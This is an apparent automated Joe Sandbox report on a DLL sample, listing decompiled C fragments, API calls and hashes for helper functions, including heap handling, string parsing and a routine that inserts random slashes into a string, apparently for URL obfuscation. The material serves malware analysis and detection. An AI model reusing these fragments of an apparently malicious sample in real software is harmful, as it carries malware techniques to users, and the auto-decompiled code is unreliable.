
Part of subcall function 00DE4039: WaitForSingleObject.KERNEL32(00000000,?,?,?,00DE30C2,?,00DE30C2,?,?,?,?,?,00DE30C2,?), ref: 00DE4113
Part of subcall function 00DE4039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00DE30C2,?,?,?,?,?,00DE211B,?), ref: 00DE413B

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: d3120ee9433b8f8df2ef86073496626740db96d44e2ecc9b32d6448524a94f46
Instruction ID: b044a23f86b94d441f5662e75104dfc6703212dd929d5325ab93e0d7d8568784
Opcode Fuzzy Hash: d3120ee9433b8f8df2ef86073496626740db96d44e2ecc9b32d6448524a94f46
Instruction Fuzzy Hash: D4219572900295ABCF20BFE688899FEB7BDEB44350B444429FA11E7140DB71DE448BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE4D09, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00DE4D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00DE6837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00de4d15
0x00de4d19
0x00de4d1a
0x00de4d1b
0x00de4d1d
0x00de4d1f
0x00de4d24
0x00de4d27
0x00de4dbe
0x00de4dc5
0x00de4dc5
0x00de4d30
0x00de4d37
0x00de4d47
0x00de4d47
0x00de4d4d
0x00de4d4f
0x00de4d54
0x00de4d5d
0x00de4d65
0x00de4d68
0x00de4d73
0x00de4d77
0x00de4d79
0x00de4d7a
0x00de4d83
0x00de4d87
0x00de4d98
0x00de4d89
0x00de4d8e
0x00de4d93
0x00de4da2
0x00de4da2
0x00de4d77
0x00de4da8
0x00de4dae
0x00de4dae
0x00de4db7
0x00de4dbc
0x00de4dbc
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00DE4D37
lstrlenW.KERNEL32(?), ref: 00DE4D6D
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00DE4D8E
SysFreeString.OLEAUT32(?), ref: 00DE4DA2

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 7be6927508033ca8ae3a6965fc028b22095b22d53d92b7db7d868df8143ad2e7
Instruction ID: 057da71bdbbd7379a232c23c63be0161548c912dc0d3816eb816da6847517627
Opcode Fuzzy Hash: 7be6927508033ca8ae3a6965fc028b22095b22d53d92b7db7d868df8143ad2e7
Instruction Fuzzy Hash: B1216D75A01259EFCB10EFA9C8849DEBBB8FF48315B1041A9E905E7310EB70DA00CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00DE52E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00DE52E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xdea290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xdea2a8; // 0x97af8f88
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xdea2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00de52ed
0x00de52f0
0x00de52f6
0x00de530e
0x00de5312
0x00de5315
0x00de5317
0x00de531a
0x00de531c
0x00de531f
0x00de5321
0x00de5321
0x00de5323
0x00de532e
0x00de5333
0x00de5344
0x00de534c
0x00de5351
0x00de5354
0x00de5357
0x00de5359
0x00de535f
0x00de5362
0x00de5362
0x00de5362
0x00de536d
0x00de5372
0x00de537c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00DE62E0,00000000,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE52F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 00DE5308
memcpy.NTDLL(00000000,03D19630,-00000008,?,?,?,00DE62E0,00000000,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE534C
memcpy.NTDLL(00000001,03D19630,00000001,00DE70D9,00000000,03D19630), ref: 00DE536D

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 02214441c390467fe241e8f95721710b6ec6619af64b92ce62f13d534bc07080
Instruction ID: 813b6e41cfdd8dae38424e777da55613e911008e1c0e2ac719a06e4394e8e8c4
Opcode Fuzzy Hash: 02214441c390467fe241e8f95721710b6ec6619af64b92ce62f13d534bc07080
Instruction Fuzzy Hash: 10112C72A002557FC710AF6ADCC4D5EBBBDDB813A0B050276F504DB250E6709E00C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DE578C, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00DE578C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00DE6837(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xde92a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xde92a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00de5797
0x00de579b
0x00de579d
0x00de579e
0x00de57a6
0x00de57a6
0x00de57aa
0x00000000
0x00000000
0x00de57a1
0x00de57a2
0x00de57a5
0x00de57a5
0x00de57b2
0x00de57b9
0x00de57bd
0x00de57c5
0x00de57cb
0x00de57cd
0x00de57d2
0x00de57d6
0x00de57d8
0x00de57db
0x00de57e2
0x00de57e2
0x00de57ec
0x00de57ef
0x00de57f2
0x00de57f2
0x00de57fe
0x00de57fe
0x00de580b

APIs

StrChrA.SHLWAPI(?,00000020,00000000,03D1962C,?,?,?,00DE1128,03D1962C,?,?,00DE55D3), ref: 00DE57A6
StrTrimA.SHLWAPI(?,00DE92A4,00000002,?,?,?,00DE1128,03D1962C,?,?,00DE55D3), ref: 00DE57C5
StrChrA.SHLWAPI(?,00000020,?,?,?,00DE1128,03D1962C,?,?,00DE55D3,?,?,?,?,?,00DE6BD8), ref: 00DE57D0
StrTrimA.SHLWAPI(00000001,00DE92A4,?,?,?,00DE1128,03D1962C,?,?,00DE55D3,?,?,?,?,?,00DE6BD8), ref: 00DE57E2

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 4e0bb8b92b8e09f3dbceefaf182718d4726a09fd7390e63f7a33593046aade4c
Instruction ID: a74f9f0ed49c719a706bb88f252e392610298d6e5305cddd3bf7ed0feed930d1
Opcode Fuzzy Hash: 4e0bb8b92b8e09f3dbceefaf182718d4726a09fd7390e63f7a33593046aade4c
Instruction Fuzzy Hash: 7501D2716057A1AFD320BA1A9C89E2BBE98EF86B94F110518F881C7340DBA1C80186B1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48151D, Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6D481541

Part of subcall function 6D481C28: __fltout2.LIBCMT ref: 6D481C51

__cftog_l.LIBCMT ref: 6D481567
__cftoe_l.LIBCMT ref: 6D481599

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 0139714ff64fd903c031cd160c5a7dfe7d421c407e4d45243c8bd2b3cb5defed
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 37014C7254414EBBCF029F84DC41CEE3F66BF19294F558816FA2D98132C336CAB1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00DE10DD, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00DE10DD(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xdea37c; // 0x3d19630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xdea37c; // 0x3d19630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xdea030) {
					HeapFree( *0xdea290, 0, _t8);
				}
				_t14[1] = E00DE578C(_v0, _t14);
				_t11 =  *0xdea37c; // 0x3d19630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00de10dd
0x00de10dd
0x00de10e6
0x00de10f6
0x00de10f6
0x00de10fb
0x00de1100
0x00000000
0x00000000
0x00de10f0
0x00de10f0
0x00de1102
0x00de1106
0x00de1118
0x00de1118
0x00de1128
0x00de112b
0x00de1130
0x00de1134
0x00de113a

APIs

RtlEnterCriticalSection.NTDLL(03D195F0), ref: 00DE10E6
Sleep.KERNEL32(0000000A,?,?,00DE55D3,?,?,?,?,?,00DE6BD8,?,00000001), ref: 00DE10F0
HeapFree.KERNEL32(00000000,00000000,?,?,00DE55D3,?,?,?,?,?,00DE6BD8,?,00000001), ref: 00DE1118
RtlLeaveCriticalSection.NTDLL(03D195F0), ref: 00DE1134

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: e35e1f126394f063171c1f0935979525a68f0fae5a555fae9c1bfb587fbe6378
Instruction ID: 6e4c0234fb0c07cb2d62e364f9a57ab21cbbfcc47e6471dcf1c71b1cfffe1285
Opcode Fuzzy Hash: e35e1f126394f063171c1f0935979525a68f0fae5a555fae9c1bfb587fbe6378
Instruction Fuzzy Hash: 2FF0F8743063C29BE721BFAAED89B1ABBA8AB04740B048404F655DF361C630E840CB36

Uniqueness

Uniqueness Score: -1.00%

Function 00DE5076, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DE5076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xdea2c4; // 0x234
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xdea308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xdea2c4; // 0x234
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xdea290; // 0x3920000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00de5076
0x00de507d
0x00de50c7
0x00de50c9
0x00de50c9
0x00de5081
0x00de5087
0x00de508c
0x00de5090
0x00de5096
0x00de509d
0x00000000
0x00000000
0x00de509f
0x00de50a4
0x00000000
0x00000000
0x00000000
0x00de50a4
0x00de50a6
0x00de50ae
0x00de50b1
0x00de50b1
0x00de50b7
0x00de50be
0x00de50c1
0x00de50c1
0x00000000

APIs

SetEvent.KERNEL32(00000234,00000001,00DE56C9), ref: 00DE5081
SleepEx.KERNEL32(00000064,00000001), ref: 00DE5090
CloseHandle.KERNEL32(00000234), ref: 00DE50B1
HeapDestroy.KERNEL32(03920000), ref: 00DE50C1

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 6a473c7c257370014ff98769a42a9f1dbc20f0b3eeaebf617a0fc83c657f2a9b
Instruction ID: b13d3bfaebcbb639a9b1b9847312621fa6a5abf19e03f43cbec47386fee6a542
Opcode Fuzzy Hash: 6a473c7c257370014ff98769a42a9f1dbc20f0b3eeaebf617a0fc83c657f2a9b
Instruction Fuzzy Hash: 03F03771B017929BDB31BB7AECCCB5677A8AB04755B090154BD04EF3D4CA25E80089B1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE50DF, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00DE50DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xdea37c; // 0x3d19630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xdea37c; // 0x3d19630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xdea37c; // 0x3d19630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xdeb83e) {
					HeapFree( *0xdea290, 0, _t10);
					_t7 =  *0xdea37c; // 0x3d19630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00de50df
0x00de50e8
0x00de50f8
0x00de50f8
0x00de50fd
0x00de5102
0x00000000
0x00000000
0x00de50f2
0x00de50f2
0x00de5104
0x00de5109
0x00de510d
0x00de5120
0x00de5126
0x00de5126
0x00de512f
0x00de5131
0x00de5135
0x00de513b

APIs

RtlEnterCriticalSection.NTDLL(03D195F0), ref: 00DE50E8
Sleep.KERNEL32(0000000A,?,?,00DE55D3,?,?,?,?,?,00DE6BD8,?,00000001), ref: 00DE50F2
HeapFree.KERNEL32(00000000,?,?,?,00DE55D3,?,?,?,?,?,00DE6BD8,?,00000001), ref: 00DE5120
RtlLeaveCriticalSection.NTDLL(03D195F0), ref: 00DE5135

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: cf7b50d0d4645b3d85a4b5a01ba7a542c0f638695b5c2709c0c4cf3c2499fc70
Instruction ID: b88d610af093b65a01254917d28b4b265599a105bf85cf002b25e19c2e9c8a5c
Opcode Fuzzy Hash: cf7b50d0d4645b3d85a4b5a01ba7a542c0f638695b5c2709c0c4cf3c2499fc70
Instruction Fuzzy Hash: 02F0D4782017C2DBE718FB6AECE9B267BA4AB48755B044019F906DF364C730AC00DA36

Uniqueness

Uniqueness Score: -1.00%

Function 6D48D0C0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,6D55F148,00000646), ref: 6D48D13C

Strings

coas, xrefs: 6D48D17F
C:\Users\user\Desktop, xrefs: 6D48D173

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: FileModuleName
String ID: C:\Users\user\Desktop$coas
API String ID: 514040917-3372674038
Opcode ID: cc766488978be84913890e7950abf24cb980ffa6d07024566bfda04e4769536a
Instruction ID: 008bc5dc014290b39c0ecc9be1e0274ced4dbb6fbe6e657992d95b092e574c69
Opcode Fuzzy Hash: cc766488978be84913890e7950abf24cb980ffa6d07024566bfda04e4769536a
Instruction Fuzzy Hash: E43170B1A141109FDF18EF29D954B7A37F5AB8A254B06412FE84AD7381EB74DC008BD5

Uniqueness

Uniqueness Score: -1.00%

Function 6D47EAFC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 6D47EB04
RtlEncodePointer.NTDLL(6D4C9284), ref: 6D47EBA7

Strings

8}Lm, xrefs: 6D47EBF0

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: Pointer$DecodeEncode
String ID: 8}Lm
API String ID: 3571222163-658368957
Opcode ID: 71899bcfac807ea694b42e509fcd4df4e2fd7b2f06a0c5540c3c6c2d4f41baf1
Instruction ID: e865b673c5f60f7518d8a246abd3f0348f3bfaf7562df7aa9f92e473422b9ad7
Opcode Fuzzy Hash: 71899bcfac807ea694b42e509fcd4df4e2fd7b2f06a0c5540c3c6c2d4f41baf1
Instruction Fuzzy Hash: 48216736D09212ABDF21AF25D880FD63B74EB07329722057AE955A7250C736DC40CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 6D482032, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsnlen.LIBCMT ref: 6D482045

Strings

U, xrefs: 6D48204E

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: 08f8886897b69ded0e2f374c73ae6f28b68fe5ada365a4bb216150bf5822723d
Instruction ID: 0ae365d3c17f3a08a2a89f4f73c16958f8bd0e522b74be54a10fc8c730e9e5ed
Opcode Fuzzy Hash: 08f8886897b69ded0e2f374c73ae6f28b68fe5ada365a4bb216150bf5822723d
Instruction Fuzzy Hash: 84F0BB3221C6496EEB1195B49CC4F77339DD7827D4F604429FB08C5152FF21CD41C290

Uniqueness

Uniqueness Score: -1.00%

Function 00DE3D98, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00DE3D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00DE6837(_t2);
				if(_t34 != 0) {
					_t30 = E00DE6837(_t28);
					if(_t30 == 0) {
						E00DE50CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00DE77DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00DE77DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00de3d98
0x00de3da2
0x00de3da4
0x00de3daa
0x00de3daa
0x00de3db3
0x00de3db7
0x00de3dc3
0x00de3dc7
0x00de3e3b
0x00de3dc9
0x00de3dc9
0x00de3dcd
0x00de3dd4
0x00de3dd7
0x00de3df1
0x00de3de0
0x00de3de0
0x00de3de4
0x00de3de7
0x00de3dec
0x00de3dec
0x00de3df6
0x00de3e1e
0x00de3e24
0x00de3e27
0x00de3df8
0x00de3dfa
0x00de3e02
0x00de3e0d
0x00de3e12
0x00de3e12
0x00de3e2e
0x00de3e35
0x00de3e36
0x00de3e36
0x00de3dc7
0x00de3e46

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00DE3CEE,00000000,00000000,00000000,03D19698,?,?,00DE106E,?,03D19698), ref: 00DE3DA4

Part of subcall function 00DE6837: RtlAllocateHeap.NTDLL(00000000,00000000,00DE4197), ref: 00DE6843

Part of subcall function 00DE77DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00DE3DD2,00000000,00000001,00000001,?,?,00DE3CEE,00000000,00000000,00000000,03D19698), ref: 00DE77EB
Part of subcall function 00DE77DD: StrChrA.SHLWAPI(?,0000003F,?,?,00DE3CEE,00000000,00000000,00000000,03D19698,?,?,00DE106E,?,03D19698,0000EA60,?), ref: 00DE77F5

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00DE3CEE,00000000,00000000,00000000,03D19698,?,?,00DE106E), ref: 00DE3E02
lstrcpy.KERNEL32(00000000,00000000), ref: 00DE3E12
lstrcpy.KERNEL32(00000000,00000000), ref: 00DE3E1E

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: c155947637e4a62aba3462ed296bd766641d809df5043a6eac5e541c8b862186
Instruction ID: 96027f11a2a25a38502fe45c0ac5e797d135d4e04eca53c33517132e01fb6926
Opcode Fuzzy Hash: c155947637e4a62aba3462ed296bd766641d809df5043a6eac5e541c8b862186
Instruction Fuzzy Hash: 1021A2725042D5ABCB12BF66CC99AABBFB8DF06790B444055F9049B212D730DE01C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DE5D37, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DE5D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00DE6837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00de5d4c
0x00de5d50
0x00de5d5a
0x00de5d61
0x00de5d64
0x00de5d66
0x00de5d6e
0x00de5d73
0x00de5d81
0x00de5d86
0x00de5d90

APIs

lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,03D192FC,?,00DE1B37,004F0053,03D192FC,?,?,?,?,?,?,00DE20B0), ref: 00DE5D47
lstrlenW.KERNEL32(00DE1B37,?,00DE1B37,004F0053,03D192FC,?,?,?,?,?,?,00DE20B0), ref: 00DE5D4E

Part of subcall function 00DE6837: RtlAllocateHeap.NTDLL(00000000,00000000,00DE4197), ref: 00DE6843

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00DE1B37,004F0053,03D192FC,?,?,?,?,?,?,00DE20B0), ref: 00DE5D6E
